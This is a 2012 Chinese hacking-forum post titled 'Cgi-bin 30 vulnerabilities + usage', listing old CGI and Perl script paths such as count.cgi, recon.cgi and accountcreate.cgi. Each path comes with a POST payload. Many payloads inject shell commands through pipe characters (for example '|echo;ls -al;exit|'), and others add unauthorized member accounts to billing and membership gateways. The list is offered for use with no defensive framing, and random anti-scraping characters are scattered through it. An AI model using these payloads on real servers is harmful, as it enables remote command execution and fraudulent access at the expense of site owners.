找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3010|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================& Y4 `# {- t& b# H* J

3 Y2 G- \2 N( a/smspass.pl7 }* q  Y0 X0 F
username=username&password=password
7 S& @: ~' S; p/ _+ z9 ?
9 O# W% y- R1 d' D, y4 v! T/index.cgi2 H; _8 S2 e% W9 o* e+ O$ q  s
wei=ren&gen=command
. R2 o# w" x; N
9 E5 h! e4 X; `8 l/ r- R/passmaster.cgi
0 p. T7 f) _/ T5 e  l( n; SAction=Add&Username=Username&Password=Password
6 C5 E& ]" S& J, h2 v( T% `" G# |" s1 m/ B+ j9 G3 B1 r4 A& M
/accountcreate.cgi' Y+ ?; N6 l9 k# Q! F$ }3 {
username=username&password=password&ref1=|echo;ls|
* ]2 K8 H- o1 Z6 m( ~
! j$ E$ m& a7 q: F6 a/form.cgi4 @- O7 y, T0 E& p
name=xxxx&email=email&subject=xxxx&response=|echo;ls|- M% `5 E) L; F5 |( D- V- x4 @2 F! x

2 O) l  B) w, G- W# J/addusr.pl0 P8 K* Y3 v$ |0 V( T" K. X3 l8 j
/cgi-bin/EuroDebit/addusr.pl$ {, r. b7 v+ P, w
user=username&pass=Password&confirm=Password
7 ~4 W: p. f' ]. ^! s: D! x7 J) e5 W* d
/ccbill-local.asp
% X& Q' D+ v& N" o$ Y$ npost_values=username:password; F1 e$ ^6 Q$ w

8 }! e+ }4 y1 p# m: ^/count.cgi
; F9 M% |6 w( b7 |pinfile=|echo;ls -la;exit|
* ?+ K0 V, c( s. x2 U3 _9 ~8 B4 C6 Q& q' J9 H
/recon.cgi
. [5 S' M8 e0 r/recon.cgi?search
8 [7 O& u9 y1 k# l; g2 w# fsearchoption=1&searchfor=|echo;ls -al;exit|' N' l8 r9 g; T
7 G2 ]1 ?8 |8 x  H/ I/ |
/verotelrum.pl. m' a( s: W  j- z  t  x
vercode=username:password:dseegsow:add:amount<&30>
4 X) M2 k2 V/ X, X% j
0 Q9 U  {! a2 [7 r* h/af.cgi
* _4 t; l7 t. [5 b6 Z# s- }, U_browser_out=|echo;ls -la;exit;|
2 L) G5 v0 M, S  e
( c6 W$ [5 e4 [- H3 X6 i2 r. y/modify.cgi/ M/ T2 o' N0 Z5 A, q+ d. \$ b1 s
username=username&password=password&expire=30
! }' g8 I' v3 A6 r, W: G$ q. x8 W- J* b9 B$ }" p# a
/openjournal.cgi! O2 x/ u" O% P- |
edit=1&ct=2&go=|echo;ls -al;exit|
. c3 G1 q) {9 m  c* D
% S* e* R$ o* X% ^+ ]1 y" V/gx9passwd.cgi
) J" Q- H" F7 Tcmd=ADD&user=username&pass=password& E3 s! P- U4 i- g- Y
5 ^) I# R6 L2 ]
/probecontrol.cgi
& L! L) g6 |) u- |  G8 ~* ^command=enable&username=username&password=password
5 Y/ k/ y7 x# }; u" m5 V  U
6 u: I7 I" o4 ~/ ~# s0 k/recon.cgi7 l0 F0 k/ c  u% l; h  ]9 _
searchoption=3&searchfor=echo;ls -la;exit
6 ^$ ?& B* b, q- ]# {# A# c# a, G9 B5 s  |% e$ q! N- X
/htadd.pl
0 T- P3 ?+ L( k1 f5 M$ zconfigfile=|echo; ls -alt; exit
, k1 Q+ m9 G$ `: a
/ v  o% [- @2 s7 `7 c2 Z1 ]/gx9passwd.cgi0 x/ i2 }  Z, H' I! l
cmd=ADD&user=username&pass=password% Q* ~+ g4 m9 p4 d
) U$ F8 v9 I" `3 L4 \9 `! {
/ibill*.pl4 `+ o4 n/ k4 ]0 v+ V* F
reqtype=add&authpwd=authpwd&username=username&password=password2 Q$ N+ d4 u- X7 I4 M; R6 Z

. n+ _* {$ j3 R! b! u$ N/cpay.cgi( w- o% P) d2 M! z
command=add_member&username=username(EMAIL)&password=password(DES)4 G/ q3 l3 T" _' t6 _, M
! G' `! ]! x' ]! U
/globill_ut.cgi8 g7 S* ]. w% N: ?6 u  |  v; Y% @
do=add&username=username&password=password&wpassword=password$ S! m% C( K" b1 c* s* `" K9 B

3 l5 Q) w7 _* B* H* K4 M5 G/usercontrol.cgi& _% ]' ]* W  O: w
command=enable&username=USER&password=PASS
2 x# r& L/ j- L& e" |7 {0 c8 ?7 L1 y% E" a* J0 p$ ?
/globoSALErum.cgi
& D& M5 u9 _, }' X& F7 Qaction=ADD&seccode=seccode&login=username&password=password; t9 a2 l3 `; p) O& Y
. Z- Z( g( p+ c! j; |" x( ^
/addusr.pl
4 Y0 E0 t8 o+ p/ |user=USER&pass=PASS&confirm=PASS# F9 u  A5 Y& G5 i, R3 Z; Q# A4 J  A
' J  Z8 j2 C& ^# r9 n
/pincount.cgi$ F9 A7 N# b( }+ B5 s
/cgi-bin/mastergate/pincount.cgi
$ e9 r$ Q9 R+ }2 i( rpinfile=|echo;pwd;exit|
+ i4 ~: x! e3 e6 |4 F- c) m, [# b8 e4 y
/accountcreate.cgi6 e4 n1 L; u- `& u% z# w. \
/cgi-bin/gateway/accountcreate.cgi
; A5 x  n( s* {1 F6 s3 b9 susername=username&password=password&password2=password&ref1=|echo;ls -al;exit* q! B5 _! `5 O7 c: |

" N0 h- e$ ^1 J3 t1 f/af.cgi
- j+ ], i# D( X8 g: y, H/env.cgi
1 O+ b6 ?5 [/ Q; Q- `( _$ AADD+;echo;pwd;exit0 Z9 y/ z5 G& }4 I. d

/ N1 B) `: n$ i/count.cgi
* _! ?3 j$ u4 z3 spinfile=|echo;pwd;exit|
. [9 O/ r) _2 k" R( Y
/ A* `+ o  ~7 P( E/ `; \/recon.cgi% ~* m$ Q& ]1 Z+ W' f& C  |
searchoption=1&searchfor=|echo;ls%20-al;exit|2 P$ G+ l9 Q7 K& _$ W
$ I4 D  @5 h+ g" a9 [
/add.cgi
9 B# C2 J# \: Y8 |username=username&password=password&expire=30! w; ]# ~- @. Z) g4 i
7 a1 g2 \  b0 K0 w, y# e4 k
==============================
# G: _  R' \# V0 P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表